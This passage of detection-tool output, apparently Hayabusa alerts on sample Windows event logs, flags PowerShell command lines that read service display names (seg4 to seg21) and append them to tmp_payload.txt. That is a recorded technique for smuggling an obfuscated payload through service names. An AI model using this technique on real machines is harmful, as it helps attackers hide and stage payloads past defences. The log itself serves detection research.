08:34:30.888 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:32.339 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:32.339 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:32.339 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:33.784 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:33.784 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:33.784 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:35.386 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - 
Tchopper.evtx +2021-11-03 08:34:35.401 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:35.401 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:36.836 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:36.836 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:36.836 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:38.274 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:38.290 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:38.290 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:39.743 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:39.743 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:39.743 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:41.196 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:41.196 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:41.196 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:42.635 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:42.651 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:42.651 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:44.108 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:44.108 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:44.108 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:45.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:45.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:45.565 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:47.024 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:47.024 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:47.024 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:48.467 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:48.482 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:48.482 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:49.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:49.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:49.925 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:51.386 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:51.386 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:51.386 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:52.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:52.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:52.834 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:54.271 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:54.287 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:54.287 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:55.740 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:55.740 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:55.740 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:57.207 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:57.207 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
